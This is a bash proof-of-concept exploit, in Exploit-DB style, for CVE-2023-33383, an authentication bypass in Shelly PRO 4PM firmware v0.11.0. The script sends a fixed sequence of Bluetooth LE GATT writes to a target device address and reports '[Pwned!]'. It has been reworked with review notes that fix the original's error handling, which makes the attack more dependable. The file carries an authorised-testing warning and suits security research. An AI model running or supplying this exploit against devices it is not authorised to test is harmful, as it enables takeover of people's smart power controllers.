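#!/bin/bash
# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
# Google Dork: NA
# Date: 2nd August 2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
# Vendor Homepage: https://www.shelly.com/
# Software Link: NA
# Version: Firmware v0.11.0 (REQUIRED)
# Tested on: MacOS/Linux
# CVE : CVE-2023-33383
#
# Usage: ./shelly-pro4pm-cve-2023-33383.sh [BLE_MAC]
#   BLE_MAC   Bluetooth address of the target device. Defaults to the address
#             the original PoC was written against; may also be supplied via
#             the TARGET environment variable.
#
# Requires BlueZ `gatttool` and `timeout`. gatttool is run through sudo
# because raw BLE/HCI access normally needs root. This script WRITES to the
# target's GATT characteristics — only run it against a device you are
# authorised to test, and double-check the address printed in the banner.
#
# Review notes on the original PoC (behaviour preserved, defects fixed):
#   * every "did the write succeed" test examined `$?` after `sleep 1`, i.e.
#     the exit status of sleep, so a failed gatttool write was never noticed;
#   * `failed=$false` / `$failed=$true` expand to an empty string and to `=`,
#     neither of which is a valid bash assignment;
#   * all failure paths exited 0, so a caller could not tell them from success;
#   * the target MAC was hard-coded in four separate places;
#   * `substring` was assigned but never used.
# GATT handles and payload bytes are exactly those of the original PoC.

set -uo pipefail

# Target selection: positional argument > $TARGET env var > original address.
readonly DEFAULT_TARGET="c8:f0:9e:88:92:3e"
TARGET="${1:-${TARGET:-$DEFAULT_TARGET}}"
readonly TARGET

readonly RED=$'\e[31m'
readonly GREEN=$'\e[92m'
readonly WHITE=$'\e[97m'
readonly ENDCOLOR=$'\e[0m'

# Print a coloured error to stderr and exit non-zero. Arguments: message...
die() {
  printf '%s%s%s\n' "$RED" "$*" "$ENDCOLOR" >&2
  exit 1
}

# Clear the screen and show the PoC banner, including the selected target so
# the operator can confirm the address before anything is sent.
banner() {
  clear
  printf '%s\n' \
    "${GREEN}[+]*********************************************************[+]" \
    "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |" \
    "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |" \
    "${GREEN}| CVE: CVE-2023-33383 |" \
    "${GREEN}| Target: ${TARGET} |" \
    "${GREEN}[+]*********************************************************[+]" \
    "${GREEN}[Enter key to send payload, x to quit]${ENDCOLOR}"
}

# Issue one GATT write-request to $TARGET.
# Arguments: $1 - attribute handle (e.g. 0x0008), $2 - hex value to write.
# gatttool's output is discarded; its exit status is returned unchanged so the
# caller can stop at the first write the device did not accept.
gatt_write() {
  local handle=$1 value=$2
  sudo gatttool -b "$TARGET" --char-write-req -a "$handle" -n "$value" >/dev/null 2>&1
}

main() {
  local key gattout i

  banner
  read -r -s -n 1 key
  case "$key" in
    x)  exit 0 ;;
    "") ;;          # Enter: proceed
    *)  exit 0 ;;   # any other key: the original script simply fell through
  esac

  # Reachability check: enumerate primary services with a 5 s cap. Empty
  # output (timeout or connection failure) means the device is unreachable.
  gattout=$(sudo timeout 5 gatttool -b "$TARGET" --primary)
  [[ -n "$gattout" ]] || die "Connection timed out"

  # Write 1: handle 0x000d <- 00000001, as in the original PoC (looks like a
  # notification-enable write, but that is not verified here).
  gatt_write 0x000d 00000001 || die "[**Exploit Failed**] write to handle 0x000d rejected"
  printf '%s[Sending Payload]%s' "$GREEN" "$ENDCOLOR"
  sleep 1

  # Write 2: one byte to handle 0x0008.
  gatt_write 0x0008 ab || die $'\n[**Exploit Failed**] write to handle 0x0008 rejected'
  sleep 1

  # Write 3: two bytes to handle 0x0008. The original PoC never checked the
  # result of this write; it is checked now like the others.
  gatt_write 0x0008 abcd || die $'\n[**Exploit Failed**] second write to handle 0x0008 rejected'
  sleep 1

  for i in {1..5}; do
    printf '%s.' "$GREEN"
    sleep 1
  done

  # NOTE: nothing here verifies the device's resulting state. "[Pwned!]" only
  # means all three writes were accepted by the GATT server; confirm the
  # authentication bypass out-of-band (e.g. via the device's RPC interface).
  printf '\n%s[Pwned!]%s\n' "$WHITE" "$ENDCOLOR"
}

main "$@"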